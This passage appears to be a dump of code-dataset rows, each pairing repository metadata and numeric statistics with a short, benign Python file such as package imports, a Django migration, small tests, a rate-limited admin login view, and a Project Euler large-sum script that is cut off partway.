run_wiki_generator() | 38.814815 | 96 | 0.674618 | 124 | 1,048 | 5.532258 | 0.209677 | 0.151604 | 0.209913 | 0.134111 | 0.833819 | 0.833819 | 0.833819 | 0.827988 | 0.658892 | 0.520408 | 0 | 0.009357 | 0.18416 | 1,048 | 27 | 97 | 38.814815 | 0.792982 | 0 | 0 | 0.380952 | 1 | 0 | 0.274547 | 0.085796 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.142857 | 0.190476 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d76af9d7c3fc144ed9a656741c2bc080bc06aa0d | 47 | py | Python | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | null | null | null | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | 1 | 2021-03-11T12:45:59.000Z | 2021-03-11T12:45:59.000Z | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | null | null | null | from prigen.generators import PrimersGenerator
| 23.5 | 46 | 0.893617 | 5 | 47 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d77dd87111e0c6f01c351723b456afa8a3053955 | 747 | py | Python | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | class Action:
@staticmethod
def action(tokens):
return tokens
class ExpressionAction(Action):
@staticmethod
def action(tokens):
return {
'$'
+ ''.join(
[
part.capitalize() if i else part
for i, part in enumerate(tokens[0].lower().split('_'))
]
): tokens[1:]
}
class UnaryExpressionAction(Action):
@staticmethod
def action(tokens):
return {
'$'
+ ''.join(
[
part.capitalize() if i else part
for i, part in enumerate(tokens[0].lower().split('_'))
]
): tokens[-1]
}
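A quick sketch of what these actions produce. This is a standalone reimplementation for illustration; here `tokens` is a plain list standing in for the parser's token results:

```python
def to_operator(name):
    # Same SNAKE_CASE -> '$camelCase' conversion the actions perform.
    head, *rest = name.lower().split('_')
    return '$' + head + ''.join(p.capitalize() for p in rest)

# ExpressionAction: operator plus an argument list.
tokens = ['DATE_TO_STRING', 'a', 'b']
expr = {to_operator(tokens[0]): tokens[1:]}
print(expr)   # -> {'$dateToString': ['a', 'b']}

# UnaryExpressionAction: operator plus a single (last) argument.
tokens = ['ABS', 'x']
unary = {to_operator(tokens[0]): tokens[-1]}
print(unary)  # -> {'$abs': 'x'}
```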
| 22.636364 | 74 | 0.429719 | 60 | 747 | 5.316667 | 0.35 | 0.169279 | 0.197492 | 0.253919 | 0.818182 | 0.818182 | 0.695925 | 0.695925 | 0.695925 | 0.695925 | 0 | 0.009852 | 0.456493 | 747 | 32 | 75 | 23.34375 | 0.775862 | 0 | 0 | 0.571429 | 0 | 0 | 0.005355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0 | 0.107143 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
ad0b9f8196ade5887ad082d8c2d90ad7476944ff | 73 | py | Python | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | from .features import *
from .estimate import *
from .estimator import *
| 18.25 | 24 | 0.753425 | 9 | 73 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 73 | 3 | 25 | 24.333333 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad9e663a6b1c76235d7ad34a3ac6d7813a9b6501 | 119 | py | Python | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | 4 | 2019-04-05T03:31:46.000Z | 2020-02-27T15:30:07.000Z | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | null | null | null | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from sqlast.Version import version
def test_version_version():
assert version == '1.0.0'
| 17 | 34 | 0.663866 | 17 | 119 | 4.529412 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.176471 | 119 | 6 | 35 | 19.833333 | 0.744898 | 0.176471 | 0 | 0 | 0 | 0 | 0.052083 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8f96d38756176383fe52b3753565b88bd663411 | 62 | py | Python | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | 20 | 2021-06-28T16:56:50.000Z | 2021-12-14T18:27:37.000Z | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | null | null | null | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | 3 | 2021-06-28T17:00:02.000Z | 2021-12-14T18:28:25.000Z | from collinearity.SelectNonCollinear import SelectNonCollinear | 62 | 62 | 0.935484 | 5 | 62 | 11.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048387 | 62 | 1 | 62 | 62 | 0.983051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
66fde586f35f9f552d11b6a9786bb92de5be0a08 | 210 | py | Python | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | 1 | 2021-01-21T07:13:31.000Z | 2021-01-21T07:13:31.000Z | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | null | null | null | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | null | null | null | from .transforms import Compose
from .stereo_trans import (
ToTensor, RandomCrop, Normalize, StereoPad, CenterCrop
)
__all__ = ['Compose', 'ToTensor', 'RandomCrop', 'Normalize', 'StereoPad', 'CenterCrop']
| 30 | 87 | 0.738095 | 20 | 210 | 7.5 | 0.6 | 0.24 | 0.36 | 0.48 | 0.613333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 210 | 6 | 88 | 35 | 0.819672 | 0 | 0 | 0 | 0 | 0 | 0.252381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0f502f13290214aff2307efc69ced3e1fb1dc50b | 5,633 | py | Python | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2019-10-03 15:32
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ngw', '0011_choicecontactfield_datecontactfield_datetimecontactfield'
'_emailcontactfield_filecontactfield_imagecon'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='choice_group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='choices',
to='ngw.ChoiceGroup'),
),
migrations.AlterField(
model_name='contactfield',
name='choice_group',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
to='ngw.ChoiceGroup',
verbose_name='Choice group'),
),
migrations.AlterField(
model_name='contactfield',
name='choice_group2',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name='second_choices_set',
to='ngw.ChoiceGroup',
verbose_name='Second choice group'),
),
migrations.AlterField(
model_name='contactfield',
name='contact_group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to='ngw.ContactGroup',
verbose_name='Only for'),
),
migrations.AlterField(
model_name='contactfieldvalue',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='values',
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='contactfieldvalue',
name='contact_field',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='values',
to='ngw.ContactField'),
),
migrations.AlterField(
model_name='contactgroupnews',
name='contact_group',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name='news_set',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactingroup',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='contactingroup',
name='group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactmsg',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
verbose_name='Contact'),
),
migrations.AlterField(
model_name='contactmsg',
name='group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='message_set',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactmsg',
name='read_by',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name='msgreader',
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='groupingroup',
name='father',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name='direct_gig_subgroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupingroup',
name='subgroup',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name='direct_gig_supergroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupmanagegroup',
name='father',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='direct_gmg_subgroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupmanagegroup',
name='subgroup',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='direct_gmg_supergroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='log',
name='contact',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to=settings.AUTH_USER_MODEL),
),
]
| 34.987578 | 79 | 0.539499 | 485 | 5,633 | 6.080412 | 0.175258 | 0.051543 | 0.085453 | 0.134283 | 0.81214 | 0.783995 | 0.743642 | 0.724313 | 0.597152 | 0.46253 | 0 | 0.00638 | 0.360021 | 5,633 | 160 | 80 | 35.20625 | 0.81165 | 0.012249 | 0 | 0.771242 | 1 | 0 | 0.15285 | 0.026794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026144 | 0 | 0.045752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0f6e669980fedaac04a91892252e1057000652b3 | 228 | py | Python | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | from django.contrib import admin
from ratelimit.decorators import ratelimit
@ratelimit(key='ip', rate='5/h', block=True)
def extend_admin_login(request, extra_context=None):
return admin.site.login(request, extra_context)
| 28.5 | 52 | 0.789474 | 33 | 228 | 5.333333 | 0.69697 | 0.136364 | 0.193182 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.100877 | 228 | 7 | 53 | 32.571429 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0.02193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7e3fea706fb97f9afcb328081840fc3db9d6f45a | 30 | py | Python | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 8 | 2021-12-20T14:57:34.000Z | 2022-01-14T01:24:45.000Z | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 21 | 2021-12-20T09:55:57.000Z | 2022-03-07T08:48:37.000Z | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 2 | 2022-01-04T21:23:01.000Z | 2022-02-04T10:32:54.000Z | from .service import _service
| 15 | 29 | 0.833333 | 4 | 30 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e5142afcfc430c799c9afce864e0c94f271c5b6 | 196 | py | Python | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 385 | 2019-10-21T14:36:08.000Z | 2022-03-31T16:35:53.000Z | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 115 | 2019-10-19T02:41:58.000Z | 2022-03-04T23:00:41.000Z | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 303 | 2019-10-18T07:27:40.000Z | 2022-03-29T12:44:01.000Z | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.Presentation)
admin.site.register(models.Speaker)
admin.site.register(models.Track)
| 21.777778 | 40 | 0.811224 | 27 | 196 | 5.888889 | 0.481481 | 0.169811 | 0.320755 | 0.433962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 196 | 8 | 41 | 24.5 | 0.893258 | 0.132653 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0e63d7f59aa0685ad20e3a0e7a10fada13fde183 | 46 | py | Python | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | 1 | 2022-02-02T08:30:29.000Z | 2022-02-02T08:30:29.000Z | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | null | null | null | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | null | null | null | from .pipeline import create_pipeline # NOQA
| 23 | 45 | 0.804348 | 6 | 46 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 1 | 46 | 46 | 0.923077 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e9e456f095e2315688e0d1cd6e1835a2e55ec1a | 157 | py | Python | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Blueprint
api = Blueprint('api_1_0', __name__)
from . import authentication, user, error
| 17.444444 | 41 | 0.700637 | 22 | 157 | 4.727273 | 0.818182 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030075 | 0.152866 | 157 | 8 | 42 | 19.625 | 0.75188 | 0.273885 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
7ee129242ccabb9bd6b87a61196c01e10c37bd0d | 36 | py | Python | doctorbot/hospital_crawler/views/__init__.py | zuxfoucault/DoctorBot_demo | 82e24078da4d2e6caba728b959812401109e014d | [
"MIT"
] | 1 | 2020-09-24T07:26:14.000Z | 2020-09-24T07:26:14.000Z | doctorbot/hospital_crawler/views/__init__.py | lintzuhsiang/Doctorbot | 6be98bbf380d14bb789d30a137ded3b51b3f31fd | [
"MIT"
] | null | null | null | doctorbot/hospital_crawler/views/__init__.py | lintzuhsiang/Doctorbot | 6be98bbf380d14bb789d30a137ded3b51b3f31fd | [
"MIT"
] | null | null | null | from .movie_view import MovieDetail
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
70e643f2c110657bc05fe9afce7b576fa78ac4f1 | 61 | py | Python | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | from .mnist import *
from .svhn import *
from .usps import *
| 15.25 | 20 | 0.704918 | 9 | 61 | 4.777778 | 0.555556 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 3 | 21 | 20.333333 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cb12539a3c59878c87d69ff9cbb6ed45cd542f1c | 243 | py | Python | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | 2 | 2022-01-20T06:16:00.000Z | 2022-01-20T07:30:26.000Z | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | null | null | null | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | null | null | null | #----------------------------------------------------------------------
# Libraries
from .get import *
from .encoding import *
from .stringExtension import *
#----------------------------------------------------------------------
| 30.375 | 73 | 0.26749 | 11 | 243 | 6 | 0.636364 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115226 | 243 | 7 | 74 | 34.714286 | 0.302326 | 0.617284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cb1e0a9624230e75482ae64be567028b3ad23a41 | 327 | py | Python | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | from agents.common import PLAYER1, PLAYER2, NO_PLAYER, next_player
def test_next_player_expectedPLAYER1():
    assert next_player(PLAYER2) == PLAYER1


def test_next_player_expectedPLAYER2():
    assert next_player(PLAYER1) == PLAYER2


def test_next_player_expectedNOPLAYER():
    assert next_player(NO_PLAYER) == NO_PLAYER
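A minimal `next_player` consistent with these three tests would look like the sketch below (illustrative only; the real constants and implementation live in `agents.common`):

```python
PLAYER1, PLAYER2, NO_PLAYER = 1, 2, 0

def next_player(player):
    # Swap between the two players; NO_PLAYER maps to itself.
    if player == PLAYER1:
        return PLAYER2
    if player == PLAYER2:
        return PLAYER1
    return NO_PLAYER
```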
| 23.357143 | 66 | 0.792049 | 42 | 327 | 5.785714 | 0.357143 | 0.288066 | 0.135802 | 0.209877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.131498 | 327 | 13 | 67 | 25.153846 | 0.827465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.428571 | true | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
cb8770c793e24d90bf0fb8e3e253a244574d3a78 | 6,272 | py | Python | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | # **************************************************************************** #
# #
# ::: :::::::: #
# 13:Large_sum.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: adelille <adelille@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2021/09/23 20:48:56 by adelille #+# #+# #
# Updated: 2021/09/23 20:54:25 by adelille ### ########.fr #
# #
# **************************************************************************** #
# I love C, but fuck C in this particular situation:
# there I'd have to store the 100 fifty-digit numbers as strings
# and add them column by column, carrying whenever a digit goes over 10.
# Python's arbitrary-precision ints make all of that unnecessary.
numbers = """37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
